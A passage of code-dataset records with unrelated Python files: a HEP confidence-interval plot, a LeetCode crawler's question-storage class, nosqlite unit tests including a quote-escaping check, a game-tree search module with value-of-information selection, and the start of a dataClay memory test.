alpha=alpha)\n\n return lambda_CI_LL_twosided, lambda_CI_UL_twosided, lambda_CI_UL_onesided, lambda_CI_UL_onesided_CLs\n\n\ndef show_confidence_intervals_with_CLs(experiments, theta_true, xmin_inf = -1e10, figsize=(10,8)):\n\n fig, axes = plt.subplots(ncols=2, figsize=figsize)\n ax = axes.flatten()\n\n yshift = 0.4\n\n for i, experiment in enumerate(experiments):\n n = experiment[0]\n ll_2s = experiment[1]\n ul_2s = experiment[2]\n ul_1s = experiment[3]\n ul_1s_CLs = experiment[4]\n ax[0].scatter(n, 2*i, c='navy',)\n ax[1].scatter(n, 2*i, c='navy',)\n ax[1].scatter(n, 2*i+yshift, c='navy',)\n ax[0].hlines(2*i, xmin=ll_2s, xmax=ul_2s, colors='r')\n ax[1].hlines(2*i, xmin=xmin_inf, xmax=ul_1s, colors='purple')\n ax[1].hlines(2*i+yshift, xmin=xmin_inf, xmax=ul_1s_CLs, colors='forestgreen')\n\n ax[0].axvline(theta_true, linestyle='--', label=r\"$\\theta_{true}$\", c='k')\n ax[1].axvline(theta_true, linestyle='--', label=r\"$\\theta_{true}$\", c='k')\n \n ax[0].scatter(experiments[0,0], 0, c='navy', label='$n_{obs}$')\n ax[1].scatter(experiments[0,0], 0, c='navy', label='$n_{obs}$')\n \n ax[0].hlines(9, xmin=experiments[0,1], xmax=experiments[0,2], colors='r', label='Two-sided CI')\n ax[1].hlines(0, xmin=xmin_inf, xmax=experiments[0,3], colors='purple', label='One-sided, upper bound CI')\n ax[1].hlines(yshift, xmin=xmin_inf, xmax=experiments[0,4], colors='forestgreen', label=r'One-sided, upper bound CI from $CL_{s}$')\n\n ax[0].legend()\n ax[1].legend(loc='upper left', bbox_to_anchor=(1,1))\n \n ax[0].set_xlim(0.0, 30.0)\n ax[1].set_xlim(0.0, 30.0)\n\n ax[0].get_yaxis().set_visible(False)\n ax[1].get_yaxis().set_visible(False)\n\n ax[0].set_title(r\"Two-sided confidence interval\")\n ax[1].set_title(r\"One-sided, upper bounded confidence interval\")\n \n return fig, ax\n","sub_path":"applications/HEP/hepstat.py","file_name":"hepstat.py","file_ext":"py","file_size_in_byte":2311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"338409392","text":"# -*- coding: utf-8 -*-\n# @Author: Tianxiao Yang\n# @Date: 2017-06-12 20:28:36\n# @Last Modified by: Tianxiao Yang\n# @Last Modified time: 2017-06-19 14:49:01\nfrom util.common import *\n\n\nclass QuestionContent:\n\n # This class cannot be re-loaded when not saved\n is_loaded_table = {}\n\n reg = '.*---{0}_BEGIN---\\n(.*?)\\n---{0}_END---.*'\n sep = '---{0}_BEGIN---\\n{1}\\n---{0}_END---\\n'\n\n def __init__(self):\n self.f_text = \"\"\n self.content = \"\"\n self.script_arr = []\n self.is_locked = False\n self.problem_id = None\n\n def __str__(self):\n return str(self.problem_id) + \".txt\"\n\n def load(self, problem_id, new=False):\n\n if self.problem_id is not None:\n elog(\"Duplicate QuestionContent Loading Error\", \"question content with id: {0} is trying to load again\".format(self.problem_id)) \n\n if self.problem_id in QuestionContent.is_loaded_table and QuestionContent.is_loaded_table[self.problem_id]:\n elog(\"Duplicate QuestionContent Loading Error\", \"question content is trying to load before other object save their data\")\n\n # only read content when the problem content is not new content\n if not new:\n # this has to be str(problem_id), because self.problem_id is the identifier for this object,\n # I have to set it at the end of the function\n text = read_file(DATA_CONTENT_PATH, str(problem_id) + \".txt\")\n if text == \"locked\":\n print('problem: {0} is locked'.format(self.problem_id))\n self.is_locked = True\n if not text:\n print(\"load question: {0} content failed\".format(self.problem_id))\n self.f_text = text\n\n self.problem_id = str(problem_id)\n QuestionContent.is_loaded_table[self.problem_id] = True\n\n def get_content(self):\n if self.is_locked:\n return \"locked\"\n if self.content == \"\":\n if self.problem_id is None:\n elog('Get Content Error', 'problem has not been loaded yet')\n self.content = self.parse_content(self.f_text)\n return self.content\n\n \"\"\"\n This method return a encoded string as script\n \"\"\"\n def get_script(self, s_type):\n if self.is_locked:\n return \"locked\"\n if not self.script_arr:\n if self.problem_id is None:\n elog('Get Script Error', 'problem has not been loaded yet')\n if s_type not in ['cpp', 'java', 'python']:\n elog('Get Script Error', 'script type: {0} not supported'.format(s_type))\n script_text = self.parse_script(self.f_text)\n self.script_arr = JSONLoads(script_text)\n if not self.script_arr:\n elog(\"\", \"failed to load script_text in problem: {0} type: {1}\".format(self.problem_id, s_type))\n res = \"ERROR\"\n try:\n res = list(filter(lambda script: script['value'] == s_type, self.script_arr))[0]['defaultCode']\n except IndexError as err:\n elog(err, \"Failed to get default code\")\n return res\n\n def parser(self, p_type, f_text):\n match_obj = re.match(QuestionContent.reg.format(p_type), f_text, flags=re.DOTALL)\n if match_obj:\n return match_obj.group(1)\n else:\n elog(\"Problem Parsing Error\", \"Failed to parse \" + p_type + \" for problem: {0}\".format(self.problem_id))\n\n def parse_content(self, f_text):\n return self.parser(\"CONTENT\", f_text)\n\n def parse_script(self, f_text):\n return self.parser(\"SCRIPT\", f_text)\n\n @staticmethod\n def clear_string(s):\n\n s = replace_newline_tab(s).replace(\"'\", \"====\").replace('\"', \"'\").replace(\"====\", '\"')[:-2] + \"]\"\n s = re.sub('\\w+(\")s', \"'\", s)\n match_obj = re.match('.*\"(.)\".*', s)\n try:\n s = re.sub('(\"[^Cc]\")', \"'{0}'\".format(match_obj.group(1)), s)\n except:\n print('no C default code')\n return s\n\n def set_content(self, content):\n # html contains escaped unicode character\n content = content.encode('utf-8').decode('unicode_escape')\n self.content = content\n\n \"\"\"\n Usage: get script from leetcode.com and parse it to json then store to data\n \"\"\"\n def set_script(self, script):\n # html contains escaped unicode character\n script = script.encode('utf-8').decode('unicode_escape')\n clear_script = self.clear_string(script)\n self.script_arr = JSONLoads(clear_script)\n if not self.script_arr:\n elog('', \"failed when loads json string with id: {0}\".format(self.problem_id))\n write_file(clear_script, DATA_TMP_PATH, '{0}-error.json'.format(self.problem_id))\n\n \"\"\"\n Call this function when the problem is locked\n \"\"\"\n def set_locked(self):\n self.is_locked = True\n\n def save(self):\n if self.problem_id is None:\n elog('Save Content Error', 'problem has not been loaded yet')\n\n if self.is_locked:\n self.f_text = \"locked\"\n else:\n self.f_text = ''.join(\n [\n QuestionContent.sep.format('CONTENT', self.content),\n QuestionContent.sep.format('SCRIPT', JSONDumps(self.script_arr))\n ])\n\n write_file(self.f_text, DATA_CONTENT_PATH, self.problem_id + \".txt\")\n\n QuestionContent.is_loaded_table[self.problem_id] = False\n self.f_text = \"\"\n self.content = \"\"\n self.script_arr = []\n print(\"problem: {0} saved\".format(self.problem_id), end='\\r')\n self.problem_id = None\n","sub_path":"leet_crawler/leet_crawler/util/questioncontent.py","file_name":"questioncontent.py","file_ext":"py","file_size_in_byte":5627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"482976700","text":"# encoding: utf8\n\nimport unittest\nimport nosqlite\n\nclass Test(unittest.TestCase):\n def setUp(self):\n self.client = nosqlite.Client('.')\n self.database = self.client.memory\n\n def test_unicode_string(self):\n collection = self.database.index\n dummy = nosqlite.client(u'.')\n\n collection.insert({'data':u'111'})\n collection.insert({u'xxx':u'table'})\n collection.copy(u'collection2')\n\n collection.insert({'a': u'あいうえお'})\n\n r = collection.find_one(fields=[u'data'])\n self.assertDictEqual({'data':'111'}, r)\n\n def test_keyword_escape(self):\n collection = self.database.index\n\n data = {'index':'index'}\n\n # insert\n collection.insert(data)\n collection.insert({'drop':'table'})\n\n # find\n self.assertDictEqual(data, collection.find_one(index='index'))\n self.assertDictEqual(data, collection.find_one(index='index', fields=[\"index\"]))\n\n # update\n collection.update(data, index='index')\n\n # rename\n collection.rename('table')\n collection.rename('index')\n\n # copy\n collection.copy('create')\n\n # delete\n collection.delete(index='index')\n collection.delete()\n\n def test_nonexist_field(self):\n collection = self.database.collection\n data = {'key1':'val1', 'key2':'val2'}\n collection.insert(data)\n\n self.assertEqual(data, collection.find_one(key1='val1', fields=['key1','key2','key3']))\n\n def test_range_query(self):\n collection = self.database.collection\n collection.insert({'data': 5})\n collection.insert({'data':15})\n\n self.assertEqual([{'data':5}], list(collection.find('data > 0 AND data < 10')))\n self.assertEqual({'data':5}, collection.find_one('data > 0 AND data < 10'))\n self.assertEqual([{'data':5}], list(collection.find('data > ? AND data < ?', t=[0, 10])))\n self.assertEqual({'data':5}, collection.find_one('data > ? AND data < ?', t=[0, 10]))\n\n def test_sql_injection(self):\n collection = self.database.collection\n data = {'data':\"'\\\"\"}\n collection.insert(data)\n\n self.assertEqual(data, collection.find_one(data=\"'\\\"\"))\n self.assertEqual(data, collection.find_one('data=?', t=[\"'\\\"\"]))\n\n collection.update({'data':\"'\\\"\"}, data=\"'\\\"\")\n collection.update({'data':\"'\\\"\"}, 'data=?', t=[\"'\\\"\"])\n\n collection.copy('collection2', data=\"'\\\"\")\n collection.copy('collection3', 'data=?', t=[\"'\\\"\"])\n\n collection.delete(data=\"'\\\"\")\n collection.delete('data=?', t=[\"'\\\"\"])\n\n def test_query_as_dict(self):\n collection = self.database.collection\n collection.insert([{'foo':i, 'bar':i+1} for i in range(1, 100)])\n\n self.assertEqual([{'foo':50, 'bar':51}], list(collection.find({'foo':50})))\n self.assertEqual({'foo':50, 'bar':51}, collection.find_one({'foo': 50}))\n\n self.assertEqual({'foo':50, 'bar':51}, collection.find_one('foo=?', t=[50], bar=51))\n self.assertEqual({'foo':50, 'bar':51}, collection.find_one({'foo': 50}, bar=51))\n\n self.assertEqual([], list(collection.find({'foo': 50}, bar=50)))\n\n self.assertEqual(50, len(list(collection.find({'foo <=':50}))))\n self.assertEqual(49, len(list(collection.find({'foo < ':50}))))\n self.assertEqual(50, len(list(collection.find({'foo >=':50}))))\n self.assertEqual(49, len(list(collection.find({'foo > ':50}))))\n self.assertEqual( 1, len(list(collection.find({'foo = ':50}))))\n self.assertEqual(98, len(list(collection.find({'foo <>':50}))))\n self.assertEqual(98, len(list(collection.find({'foo !=':50}))))\n self.assertEqual( 1, len(list(collection.find({'foo <=':50, 'foo >=':50}))))\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"22047827","text":"import copy\nfrom abc import ABC, abstractmethod\nfrom collections import defaultdict\nimport math\nimport numpy as np\nimport random\nimport time\nfrom scipy.integrate import quad\nfrom CVIBES.PrioritizedItem import PrioritizedItem\nfrom queue import PriorityQueue\n\ndef corner_heuristic(board, previous_move_size):\n sum = 0\n\n count_heuristic = 0\n for x in range(6):\n for y in range(6):\n if board.tup66[x][y]!=0:\n sum+=1\n count_heuristic+=board.tup66[x][y]\n count_heuristic = count_heuristic/sum\n if not board.is_max:\n move_size = len(board.get_legal_moves( -1))\n move_heuristic = (previous_move_size - move_size) / (move_size + previous_move_size)\n else:\n move_size = len(board.get_legal_moves( 1))\n move_heuristic = (move_size - previous_move_size) / (move_size + previous_move_size)\n corner_heuristic = board.tup[0][0] + board.tup[5][5] + board.tup[5][0] +board.tup[0][5]\n corner_heuristic = corner_heuristic / 4\n border_heuristic = 0\n for i in range(1,4):\n border_heuristic += board.tup[0][i] + board.tup[i][5] + board.tup[5][i] +board.tup[i][0]\n border_heuristic = border_heuristic/16\n return count_heuristic*0.1 + move_heuristic*0.15+corner_heuristic*0.65+border_heuristic*0.1\n\n\n\nclass SearchAlgorithm():\n def __init__(self, root):\n self.children = dict() # children of each node\n self.child_to_father = dict()\n self.alpha = dict()\n self.beta1 = dict()\n\n self.conspiracy_queue = []\n self.BSM_K = 5\n self.BSM_N = 2\n self.node_to_path = dict()\n self.node_to_path_CVIBES = dict()\n self.node_to_dry_Us = dict()\n self.node_to_dry_Us[root] = [(root.meanvalue, 1.0)]\n self.node_to_pick = []\n\n def _compute_Us_for_all_children(self, node, s):\n # self._mark_all_S_ancestors(s)\n return self._compute_Us(node, s, return_children=True)\n\n def _compute_Us_for_node(self, node, s):\n # self._mark_all_S_ancestors(s)\n return self._compute_Us(node, s, return_children=False)[0]\n\n # Example:\n # distributions = [[(4, 0.2), (6, 0.5), (7, 1.0)], [(3, 0.4), (4, 0.6), (5, 1.0)]]\n def compute_max_probability(self, distributions, is_max=True):\n queue = PriorityQueue()\n ret_dist = []\n chance_of_every_distribution_to_be_lower_than_current_value = []\n num_of_chances_that_are_not_one_anymore = 0\n multiplied_chance = 1\n last_diff = 1\n last_distribution_cdf_used = 1\n for i in range(len(distributions)):\n if len(distributions) == 0 or len(distributions[i]) == 0 or len(distributions[i][0]) == 0:\n print(\"Zura\")\n if is_max:\n queue.put(PrioritizedItem(distributions[i][0][0], (i, distributions[i][0][1], 0)))\n else:\n if len(distributions[i]) == 1:\n chance = 1\n else:\n chance = 1 - distributions[i][-2][1]\n queue.put(PrioritizedItem(-distributions[i][-1][0], (i, chance, len(distributions[i]) - 1)))\n chance_of_every_distribution_to_be_lower_than_current_value.append(1)\n while not queue.empty():\n lowest_or_highest_value = queue.get()\n\n i = lowest_or_highest_value.item[0]\n j = lowest_or_highest_value.item[2]\n # The chance for all other distriubutions to be lower/equal than the value, and for the distribution that contained it to be that exact value\n diff = (lowest_or_highest_value.item[1] - chance_of_every_distribution_to_be_lower_than_current_value[i])\n cdf_of_current_distribution = chance_of_every_distribution_to_be_lower_than_current_value[\n lowest_or_highest_value.item[0]]\n\n if num_of_chances_that_are_not_one_anymore == len(distributions):\n\n if (last_diff * cdf_of_current_distribution) == 0:\n print(\"last_diff:\", last_diff)\n print(\"cdf_of_current_distribution:\", cdf_of_current_distribution)\n multiplied_chance_backup = multiplied_chance\n multiplied_chance *= diff * last_distribution_cdf_used / (last_diff * cdf_of_current_distribution)\n\n if multiplied_chance == 0:\n multiplied_chance = multiplied_chance_backup\n else:\n last_distribution_cdf_used = lowest_or_highest_value.item[1]\n last_diff = diff\n ret_dist.append([lowest_or_highest_value.priority, multiplied_chance])\n\n else:\n\n multiplied_chance *= lowest_or_highest_value.item[1] / \\\n chance_of_every_distribution_to_be_lower_than_current_value[i]\n\n if chance_of_every_distribution_to_be_lower_than_current_value[i] == 1:\n num_of_chances_that_are_not_one_anymore += 1\n if num_of_chances_that_are_not_one_anymore == len(distributions):\n ret_dist.append([lowest_or_highest_value.priority, multiplied_chance])\n\n chance_of_every_distribution_to_be_lower_than_current_value[i] = lowest_or_highest_value.item[1]\n\n if is_max and j < len(distributions[i]) - 1:\n chance = distributions[i][j + 1][1]\n queue.put(PrioritizedItem(distributions[i][j + 1][0], (i, chance, j + 1)))\n elif not is_max and j > 0:\n if j == 1:\n chance = 1\n else:\n chance = 1 - distributions[i][j - 2][1]\n queue.put(PrioritizedItem(-distributions[i][j - 1][0], (i, chance, j - 1)))\n\n if not is_max:\n ret_dist = reversed(ret_dist)\n ret_dist = [[-item[0], item[1]] for item in ret_dist]\n\n culmative = 0\n real_ret_dist = []\n for item in ret_dist:\n real_ret_dist.append((item[0], item[1] + culmative))\n culmative += item[1]\n\n if 20 < len(real_ret_dist):\n while 20 < len(real_ret_dist):\n approximated_ret_dist = [real_ret_dist[0]]\n i = 1\n while i < len(real_ret_dist) - 1:\n if math.fabs(approximated_ret_dist[-1][1] - real_ret_dist[i][1]) > (1 / len(real_ret_dist)):\n approximated_ret_dist.append(real_ret_dist[i])\n i = i + 1\n approximated_ret_dist.append(real_ret_dist[-1])\n real_ret_dist = approximated_ret_dist\n return approximated_ret_dist\n\n return real_ret_dist\n\n def _compute_Us(self, node, s, return_children=False):\n\n # if node.terminal:\n # if node.is_max:\n # return [-1 for b in node.buckets]\n # else:\n # return [1 for b in node.buckets]\n if self.children.get(node) is None or len(self.children.get(node)) == 0:\n if node in s:\n return node.buckets, False\n else:\n return [(node.meanvalue, 1.0)], True\n\n is_max = node.is_max\n\n if return_children:\n ret = dict()\n for c in self.children[node]:\n ret[c] = self._compute_Us(c, s)[0]\n return ret\n child_dist = []\n is_single_value = True\n for c in self.children[node]:\n d, is_single_value_child = self._compute_Us(c, s)\n child_dist.append(d)\n is_single_value = is_single_value and is_single_value_child\n if is_single_value:\n if is_max:\n ret = [(max([item[0][0] for item in child_dist]), 1.0)]\n else:\n ret = [(min([item[0][0] for item in child_dist]), 1.0)]\n\n else:\n ret = self.compute_max_probability(child_dist, is_max=is_max)\n return ret, is_single_value\n\n def gather_leaves(self, node, path):\n path.append(node)\n if self.children.get(node) is None:\n if self.node_to_path.get(node) is None:\n self.node_to_path[node] = path\n return [node]\n ret = []\n for c in self.children.get(node):\n ret = ret + self.gather_leaves(c, copy.deepcopy(path))\n return ret\n\n def _compute_difference_of_distributions(self, dist1, dist2, is_max_coefficent):\n i = 0\n j = 0\n previous_distance_i = 0\n previous_distance_j = 0\n ret = []\n cdf = 0\n while i < len(dist1) and j < len(dist2):\n dist = min(dist1[i][1] - previous_distance_j ,dist2[j][1] - previous_distance_i)\n if dist:\n ret.append((is_max_coefficent * (dist1[i][0] - dist2[j][0]), cdf + dist))\n cdf = ret[-1][1]\n if i == len(dist1) - 1:\n previous_distance_j = dist2[j][1]\n j = j + 1\n\n\n elif j == len(dist2) - 1 or (dist1[i][1]) < (dist2[j][1]):\n previous_distance_i = dist1[i][1]\n i = i + 1\n else:\n previous_distance_j = dist2[j][1]\n j = j + 1\n return ret\n \n \n \n\n def _compute_mean_of_distribution_max_0(self, dist):\n mean = max(dist[0][0], 0) * dist[0][1]\n for i in range(1, len(dist)):\n mean += max(dist[i][0], 0) * (dist[i][1] - dist[i - 1][1])\n return mean\n\n def _compute_bvoi_of_child(self, Unode, Ucompare_against, is_alpha=False, is_max=True):\n sum = 0\n is_max_coefficent = 1\n if not is_max:\n is_max_coefficent = -1\n\n if not is_alpha:\n return self._compute_mean_of_distribution_max_0(self._compute_difference_of_distributions(Unode, Ucompare_against, is_max_coefficent ))\n\n else:\n return self._compute_mean_of_distribution_max_0(self._compute_difference_of_distributions(Ucompare_against, Unode, is_max_coefficent ))\n\n def chance_for_dist_biggersmaller_than_val(self, dist, val, bigger_mode=True):\n sum = 0\n len_dist = len(dist)\n for i in range(len_dist):\n if dist[i][0] > val:\n break\n sum = dist[i][1]\n if not bigger_mode:\n return sum\n return 1 - sum\n\n def _S_gather_rec_CVIBES(self, node, v, prob_table, prob_of_root, path_table, S, path):\n\n if self.children.get(node) is None:\n S.append(node)\n path_table[node] = path + [node]\n else:\n for c in self.children[node]:\n if prob_table.get(c.__hash__(), v) is None:\n print(\"Jaja\")\n self._store_probabilities_rec(node, {}, 0.6)\n if prob_table[c.__hash__(), v] == prob_of_root:\n S = self._S_gather_rec_CVIBES(c, v, prob_table, prob_of_root, path_table, S, path + [node])\n return S\n\n def _store_probabilities(self, node, s, table, v, bigger_mode=True):\n return self._store_probabilities_rec(node, table, v, bigger_mode)\n\n def _store_probabilities_rec(self, node, table, v, bigger_mode=True):\n\n if self.children.get(node) is None or node.terminal:\n table[node.__hash__(), v] = self.chance_for_dist_biggersmaller_than_val(node.buckets, v,\n bigger_mode=bigger_mode)\n return node.buckets\n\n is_max = node.is_max\n child_dist = []\n for c in self.children[node]:\n Us_c = self._store_probabilities_rec(c, table, v, bigger_mode=bigger_mode)\n if len(Us_c) == 0:\n while True:\n print(\"Shit\")\n self._store_probabilities_rec(c, table, v, bigger_mode=bigger_mode)\n child_dist.append(Us_c)\n ret = self.compute_max_probability(child_dist, is_max=is_max)\n\n x = self.chance_for_dist_biggersmaller_than_val(ret, v, bigger_mode=bigger_mode)\n table[node.__hash__(), v] = x\n return ret\n\n def _find_k_best_VPI(self, s, k, alpha, c, is_alpha_children):\n queue = PriorityQueue()\n for leaf in s:\n item = PrioritizedItem(-1 * self._compute_bvoi_of_child(self._compute_Us_for_node(c, [leaf]),\n self._compute_Us_for_node(alpha, [leaf]),\n is_alpha=is_alpha_children,\n is_max=not alpha.is_max), leaf)\n queue.put(item)\n return queue.queue\n\n def _conspiracy_choice(self, node):\n # There are still items in the conspiracy queues\n if len(self.conspiracy_queue) > 0:\n return self.node_to_path_CVIBES[self.conspiracy_queue.pop()]\n\n # different behaviors whether we are the min or max player\n is_max = node.is_max\n\n # Lines 1-5\n alpha_node = self.alpha[node]\n alpha_mean = alpha_node.meanvalue\n coff_stash = [1.05, 1, 0.95, 0.9, 0.8]\n v_stash = []\n for coff in coff_stash:\n v_stash.append(coff * alpha_mean)\n\n prob_dict = dict()\n\n for c in self.children[node]:\n for V in v_stash:\n s = self.gather_leaves(c, [])\n if c.__hash__() == alpha_node.__hash__():\n self._store_probabilities(c, s, prob_dict, V, bigger_mode=not is_max)\n else:\n self._store_probabilities(c, s, prob_dict, V, bigger_mode=is_max)\n # Line 6\n max = 0\n maxV = None\n maxV_tag = None\n max_c = None\n for i in range(len(v_stash)):\n for j in range(i + 1, len(v_stash)):\n for c in self.children[node]:\n if c.__hash__() != alpha_node.__hash__():\n if is_max:\n eq_8 = (v_stash[i] - v_stash[j]) * prob_dict[alpha_node.__hash__(), v_stash[j]] * prob_dict[\n c.__hash__(), v_stash[i]]\n else:\n eq_8 = (v_stash[i] - v_stash[j]) * prob_dict[alpha_node.__hash__(), v_stash[i]] * prob_dict[\n c.__hash__(), v_stash[j]]\n if max < eq_8:\n max = eq_8\n if is_max:\n maxV = v_stash[j]\n maxV_tag = v_stash[i]\n else:\n maxV_tag = v_stash[j]\n maxV = v_stash[i]\n max_c = c\n if max < 0.05:\n return [node, alpha_node]\n # Lines 7-16\n S1 = self._S_gather_rec_CVIBES(alpha_node, maxV, prob_dict, prob_dict[alpha_node.__hash__(), maxV],\n self.node_to_path_CVIBES, [], [])\n S2 = self._S_gather_rec_CVIBES(max_c, maxV_tag, prob_dict, prob_dict[max_c.__hash__(), maxV_tag],\n self.node_to_path_CVIBES, [], [])\n\n # BSM(N,K)\n K1 = self._find_k_best_VPI(S1, self.BSM_K, alpha_node, self.beta1[node], is_alpha_children=True)\n K2 = self._find_k_best_VPI(S2, self.BSM_K, alpha_node, max_c, is_alpha_children=False)\n\n S = []\n i1 = 0\n i2 = 0\n K_size = min([self.BSM_K, len(K1) + len(K2)])\n for i in range(K_size):\n if i1 == len(K1):\n S.append(K2[i2].item)\n elif i2 == len(K2):\n S.append(K1[i1].item)\n elif K1[i1].priority < K2[i2].priority:\n S.append(K1[i1].item)\n i1 = i1 + 1\n else:\n S.append(K2[i2].item)\n i2 = i2 + 1\n\n leftover_1_items_with_priority = K1[i1:]\n leftover_2_items_with_priority = K2[i2:]\n leftover_1 = []\n leftover_2 = []\n # Converting the BVOI+node objects to node objects\n for i in range(len(leftover_1_items_with_priority)):\n leftover_1.append(leftover_1_items_with_priority[i].item)\n for i in range(len(leftover_2_items_with_priority)):\n leftover_2.append(leftover_2_items_with_priority[i].item)\n # Choosing random K nodes from the leftovers\n leftovers = leftover_1 + leftover_2\n S_random = random.choices(leftovers, k=min([self.BSM_K, len(leftovers)]))\n S = S + S_random\n\n # Setting the new 2K array as the new conspiracy queue\n for i in range(self.BSM_N):\n self.conspiracy_queue = self.conspiracy_queue + S\n if not self.conspiracy_queue:\n return [node, alpha_node]\n return self.node_to_path_CVIBES[self.node_to_pick.pop()]\n\n def _batch_gather_greedy(self, node):\n\n s = []\n alpha_node = self.alpha[node]\n beta1_node = self.beta1[node]\n alpha_Us = self._compute_Us(alpha_node, [])[0]\n beta_Us = self._compute_Us(beta1_node, [])[0]\n leaves = self.gather_leaves(node, [])\n\n K_queue = []\n\n if self.mode == \"FT Greedy\":\n for _ in range(self.BSM_K):\n K_queue.append((None, -1))\n if self.mode == \"MGSS*\":\n maxx = 0\n entered = 0\n for l in leaves:\n if l in s:\n continue\n c = self.node_to_path[l][1]\n Usc = self._compute_Us_for_node(c, [l])\n\n if len(Usc) > 1:\n entered +=1\n if c.__hash__() != alpha_node.__hash__():\n c_bvoi = self._compute_bvoi_of_child(Usc, alpha_Us, is_alpha=False,\n is_max=node.is_max)\n else:\n c_bvoi = self._compute_bvoi_of_child(Usc, beta_Us, is_alpha=True, is_max=node.is_max)\n\n\n if c_bvoi > 0:\n s.append(l)\n if self.mode == \"FT Greedy\":\n put_in_queue_l_vpi((l, c_bvoi), K_queue)\n if self.mode == \"MGSS*\":\n if c_bvoi > maxx:\n maxx = c_bvoi\n s = [l]\n\n\n if len(s) == 0:\n alpha_leaves = self.gather_leaves(alpha_node, [])\n for l in alpha_leaves:\n if l.meanvalue == alpha_Us[0][0]:\n s = [l]\n K_queue = [(l,0)]\n break\n \n return s, K_queue\n\n def _BVOI_select(self, node):\n if self.mode == \"FT Greedy\" and len(self.node_to_pick) > 0:\n return self.node_to_path[self.node_to_pick.pop()]\n\n if len(self.children[node]) == 1:\n for i in self.children[node]:\n if i is None:\n print(\"Oish noo2\")\n print(node.tup)\n if self.mode == \"FT Greedy\" or self.mode == \"MGSS*\":\n return [node, i]\n return i\n\n s, best_VPI_k_nodes_for_FT = self._batch_gather_greedy(node)\n if self.mode == \"MGSS*\":\n if len(s) == 0:\n return [node, self.alpha[node]]\n else:\n return self.node_to_path[s[0]]\n if self.mode == \"FT Greedy\":\n if len(s) == 0:\n return [node, self.alpha[node]]\n for _ in range(self.BSM_N):\n for l_vpi_pair in best_VPI_k_nodes_for_FT:\n if l_vpi_pair[0] is not None:\n self.node_to_pick.append((l_vpi_pair[0]))\n return self.node_to_path[self.node_to_pick.pop()]\n\n if len(s) == 0: # TODO ADD THIS!!!!!\n if self.alpha[node] is None:\n print(\"Oish noo3\")\n print(node.tup)\n return self.alpha[node]\n max = 0\n max_child = None\n alpha_node = self.alpha[node]\n beta1_node = self.beta1[node]\n child_to_Us = self._compute_Us_for_all_children(node, s)\n alpha_Us = child_to_Us[alpha_node]\n beta1_Us = child_to_Us[beta1_node]\n\n for c in self.children[node]:\n child_Us = child_to_Us[c]\n if c.__hash__() != alpha_node.__hash__():\n c_bvoi = self._compute_bvoi_of_child(child_Us, alpha_Us, is_alpha=False, is_max=node.is_max)\n else:\n c_bvoi = self._compute_bvoi_of_child(child_Us, beta1_Us, is_alpha=True, is_max=node.is_max)\n if max <= c_bvoi:\n max = c_bvoi\n max_child = c\n if max_child is None:\n print(\"bk\")\n return alpha_node\n return max_child\n\n\n\n\ndef shift_right_with_value(queue, index, new_value):\n for i in reversed(range(index + 1, len(queue))):\n queue[i] = queue[i - 1]\n queue[index] = new_value\n\n\ndef put_in_queue_l_vpi(l_vpi_pair, queue):\n for i in range(len(queue)):\n if queue[i][1] < l_vpi_pair[1]:\n shift_right_with_value(queue, i, l_vpi_pair)\n return\n\n\n\n","sub_path":"SearchAlgoirthm.py","file_name":"SearchAlgoirthm.py","file_ext":"py","file_size_in_byte":21044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"319058060","text":"from __future__ import absolute_import\n\"\"\" Class description goes here. \"\"\"\n\n\"\"\" \nUse absolute imports. By default, when you import a package in Python 2, it adds '.' in the beggining, it means all \nimports are relative. It's a problem for our testing since our test can be in a package but our stubs are not including \nthe package of the test (and shouldn't!). With __future__ we add Python 3 functionality for all imports to be absolute. \n\"\"\"\n# Initialize dataClay\nfrom mock.simplemock import SimpleMock\nfrom dataclay.heap import ExecutionEnvironmentHeapManager\nimport unittest \nimport os\nimport resource\nimport time\nimport gc\nimport sys\nfrom unittest.case import SkipTest\nimport logging\nimport pytest\nfrom dataclay.util import Configuration\n\n\"\"\"\nMemory testing. \n\"\"\"\nlogger = logging.getLogger(__name__)\n\n\nclass GCUpdateTestCase(unittest.TestCase):\n\n \"\"\"\n DataClayMock object for simulation. \n \"\"\"\n \n mock = SimpleMock() \n \n def setUp(self):\n \"\"\" To force GC, hack memory pressure \"\"\"\n\n # ToDo: the (...).Configuration is extremely ugly and completely useless\n # ToDo: @abarcelo I left it like that because I did not understand previous\n # ToDo: ExecutionEnvironmentHeapManager.GC_MEMORY_... usage\n Configuration.MEMMGMT_PRESSURE_FRACTION = 0.01\n \n rsrc = resource.RLIMIT_AS\n soft, hard = resource.getrlimit(rsrc)\n logger.debug('Soft limit starts as :%s', soft)\n logger.debug('Hard limit starts as :%s', hard)\n\n kb = 1024\n mb = 1024 * kb\n gb = 1024 * mb\n # resource.setrlimit(rsrc, (-1, hard)) \n \n soft, hard = resource.getrlimit(rsrc)\n logger.debug('Soft limit changed to :%s', soft)\n \"\"\"\n PyUnit function called before every test case.\n Starts DataClay simulation in one Python interpreter and one Java VM. This allows us to Debug in a local machine without \n dockers and without a full start of DataClay (jars, configurations, ...) \n \"\"\" \n self.mock.setUp(__file__)\n\n def tearDown(self):\n \"\"\" \n Finish all services started for simulation. \n \"\"\" \n self.mock.tearDown()\n \n @pytest.mark.timeout(300, method='thread')\n def test(self):\n \"\"\"Test. note that all test method names must begin with 'test.'\"\"\"\n \"\"\"WARNING: IT IS HIGHLY RECOMMENDED TO HAVE ONE TEST ONLY TO ISOLATE FUNCTIONAL TESTS FROM EACH OTHER. i.e. \n Start a new Python Interpreter and JVM for each test. In the end, it means only one test in this class. \"\"\"\n from dataclay.api import init\n\n logger.debug('**Starting init**')\n init()\n \n \"\"\" \n Imports. Imports must be located here in order to simulate \"import\" order in a real scenario. \n VERY IMPORTANT: Imports must be located AFTER init\n \"\"\"\n from model.classes import WebSite, WebPage, URI\n\n self.session_initialized = True\n \n \"\"\"\n Test. From now on, the Functional Test itself. \n \"\"\"\n \n host = \"bsc.es\"\n web_site = WebSite(host + \"/foo/bsc.html\")\n web_site.make_persistent(alias=web_site.uri.host)\n \n cur_host = \"volatile_web\"\n web_page = WebPage(cur_host)\n logger.debug(\"web page oid = %s\", web_page.get_object_id())\n logger.debug(\"uri oid = %s\", 